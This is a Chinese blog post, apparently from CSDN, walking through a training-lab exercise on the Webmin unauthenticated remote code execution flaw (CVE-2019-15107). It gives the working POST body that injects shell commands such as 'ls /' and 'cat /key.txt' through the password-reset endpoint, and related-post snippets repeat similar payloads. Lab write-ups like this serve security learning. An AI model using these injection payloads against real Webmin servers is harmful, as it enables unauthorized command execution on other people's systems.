Webmin未经身份验证的远程代码执行

最新推荐文章于 2024-05-17 16:18:25 发布
最新推荐文章于 2024-05-17 16:18:25 发布
阅读量405 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43828818/article/details/105914585
版权

[墨者学院]——Webmin未经身份验证的远程代码执行

做题前看看大佬写的漏洞原理:[https://blog.csdn.net/qq_43380549/article/details/100011292]

漏洞描述:Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。
在这里插入图片描述

既然是发送POST请求达到任意执行,而且无需身份验证想到的肯定是bp抓包。
在这里插入图片描述
根据漏洞的原理我们修改下面几个地方

修改post请求路径改为 /password_change.cgi
user=hhh&pass=&expired=2&old=test1 | ls /&new1=test2&new2=test2

在这里插入图片描述

发现key.txt,构造user=hhh&pass=&expired=2&old=test1 |cat /key.txt&new1=test2&new2=test2即可获得key。

在这里插入图片描述

c h e n�
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
webmin远程命令执行漏洞
m0_56578216的博客
10-12 277
该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。,只有在发送的用户参数的值不是已知的Linux用户的情况下,才会到修改/etc/shadow的地方获得命令执行的权限,触发命令注入漏洞。该webmin漏洞的漏洞点在password_change.cgi配置文件中,如果使用不存在的用户重置密码,就会定位到。如图,里面有一个镜像文件的信息和服务名,以及它的。远程命令执行漏洞(RCE)修改数据包的两处位置,
CVE-2022-36446 Webmin命令注入漏洞
weixin_45705830的博客
03-02 445
CVE-2022-36446是一个Webmin的任意命令注入漏洞,影响了1.997版本之前的Webmin。该漏洞存在于software/apt-lib.pl文件中,由于缺乏对用户输入的HTML转义,导致可以注入将连接到包管理器调用的任意命令。该漏洞可以被远程未经身份验证的攻击者利用,执行任意代码或获取系统权限。
Webmin未经身份验证远程代码执行-墨者学院
小白鸽
07-31 515
漏洞描述 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞介绍(cve-2019-15107) 1.漏洞编号: cve-2019-15107 2.漏洞描述: 该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.c
墨者学院—Webmin未经身份验证远程代码执行(简单复习)
LRedAnt的博客
12-25 1454
墨者学院—Webmin未经身份验证远程代码执行(简单复习) 背景描述: Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞介绍(cve-2019-1...
墨者学院-Webmin未经身份验证远程代码执行
qq_47094508的博客
07-01 608
首先拿到靶场后进行访问,访问后来到一个登陆页面根据题目可知,未授权的rce,所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication burp抓取流量包,然后修改参数,注意需要把session_login.cgi改成password_change.cgi,下面的参数直接复制就行 直接查询根下的key.txt即可......
Webmin未经身份验证远程代码执行(CVE-2019-15107)
菜鸟耿耿
10-09 675
Webmin未经身份验证远程代码执行(漏洞复现) 漏洞版本 CVE-2019-15107 漏洞描述 Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。 影响版本:Webmin<=1.920 环境搭建 靶机IP: 192.168.35.143 攻击者IP:192.168.35.128 启动靶机环境 docker-compose build docker-compose up -d 去访问页面
webmin 远程代码执行 (CVE-2019-15642)
weixin_42675091的博客
09-05 449
webmin 远程代码执行 (CVE-2019-15642)
【墨者学院】Webmin未经身份验证远程代码执行
yoyoko_chan的博客
07-29 498
0x00 0x01  进入靶场,发现是个登录界面  搜索查找了这个漏洞的详情后,知道了该漏洞编号为CVE-2019-15107,根据漏洞介绍,知道了该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。  所以将其用BurpSuite抓包到重放模块。修改访问地址、Referer以及POST内容  查看可知根目录下存在key.txt,修改poc读出key即可 0x03  学到了新的cve,了解了一个新的poc。 ...
Linux远程管理与监控
在Linux系统中,远程管理与监控尤为重要,因为大部分服务器都会运行在Linux系统上,远程管理可以帮助管理员快速响应和处理各种故障和安全事件,同时监控系统的性能和资源利用情况,及时调整系统配置,提高系统的稳定...
墨者靶场(初级) Webmin未经身份验证远程代码执行
曹振国的博客
06-24 332
命令执行的漏洞在old参数后 1. 漏洞原理 https://www.anquanke.com/post/id/184668 2. 漏洞复现 https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md 3. 漏洞利用 (1)修改提交地址 POST /session_login.cgi HTTP/1.1 ===> POST /password_change.cgi HTTP/1.
Webmin未经身份验证远程代码执行 CVE-2019-15107 漏洞复现
ADummy的博客
03-02 283
Webmin未经身份验证远程代码执行(CVE-2019-15107) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>远程代码执行 0x01漏洞介绍 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能执行命令,而在1.920处没有限制。 ​ 影响版本 Webmin < 1.920 0x02漏洞复现 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能
墨者Webmin未经身份验证远程代码执行(CVE-2019-15107)wp
m0_58543272的博客
08-10 561
墨者Webmin未经身份验证远程代码执行wp
墨者Webmin未经身份验证远程代码执行题解
zr1213159840的博客
01-11 430
先随便输入账号密码,然后抓包 将上图的post部分修改为 password_change.cgi 将提交的数据部分修改为 user=hhhh&pam=1&expired=2&old=cat /key.txt&new1=1111&new2=1111 一直forward拿到key
webmin远程代码执行(CVE-2022-0824 )
最新发布
qq_51780583的博客
05-17 159
webmin远程代码执行(CVE-2022-0824 )
Vulfocus--->webmin 远程代码执行 (CVE-2019-15642)
weixin_63124284的博客
10-02 587
Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码
Webmin 远程代码执行Getshell漏洞复现 编号:CVE-2022-0824
08-31 2053
WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。......
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值